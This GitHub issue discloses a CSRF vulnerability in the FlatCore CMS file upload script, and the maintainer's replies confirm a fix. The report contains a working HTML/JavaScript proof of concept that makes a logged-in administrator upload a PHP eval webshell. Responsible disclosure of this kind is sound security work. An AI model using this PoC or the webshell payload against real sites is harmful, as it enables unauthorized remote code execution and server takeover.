Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bug Report: CSRF Vulnerability in files.upload-script.php on FlatCore #39

satuer opened this issue May 26, 2019 · 3 comments


Copy link

commented May 26, 2019

Title: CSRF Vulnerability in files.upload-script.php on FlatCore
Date: 26-May-2019
Discovered by: @satuer from ABT Labs
Security: high (will cause the webshell to upload)

Code: files.upload-script.php
There is no csrf check, only have a administrator check.(Moreover, there is no check on the file type, and did not change the uploaded file name)

Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background.

We assume that FlatCore is installed at Our target is acp/core/files.upload-script.php which is the page used to upload a new file. The given POC will upload a webshell to the website.

<!-- CSRF PoC -->
function submitRequest()
var xhr = new XMLHttpRequest();"POST", "/flatCore/acp/core/files.upload-script.php", true);
xhr.setRequestHeader("Accept", "application/json");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------795986992");
xhr.withCredentials = "true";
var body = "----------795986992\r\n" +
"Content-Disposition: form-data; name=\"upload_destination\"\r\n" +
"\r\n" +
"../content/\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"w\"\r\n" +
"\r\n" +
"600\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"h\"\r\n" +
"\r\n" +
"500\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"fz\"\r\n" +
"\r\n" +
"2800\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"unchanged\"\r\n" +
"\r\n" +
"\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"testwebshell.php\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php eval($_REQUEST['parm']);?>\r\n" +
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />

Before visit the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The webshell have been uploaded.

First, administrator login.

Then, administrator visit the malicious webpage.

Attacker visit webshell.

Suggest: Check CSRF tokens in all POST request.


This comment has been minimized.

Copy link

commented May 28, 2019

Thank you! I will fix this as soon as possible.


This comment has been minimized.

Copy link

commented Jun 12, 2019

Check CSRF tokens before upload files


This comment has been minimized.

Copy link

commented Jun 13, 2019

Verified, no longer work.

@satuer satuer closed this Jun 13, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
2 participants
You can’t perform that action at this time.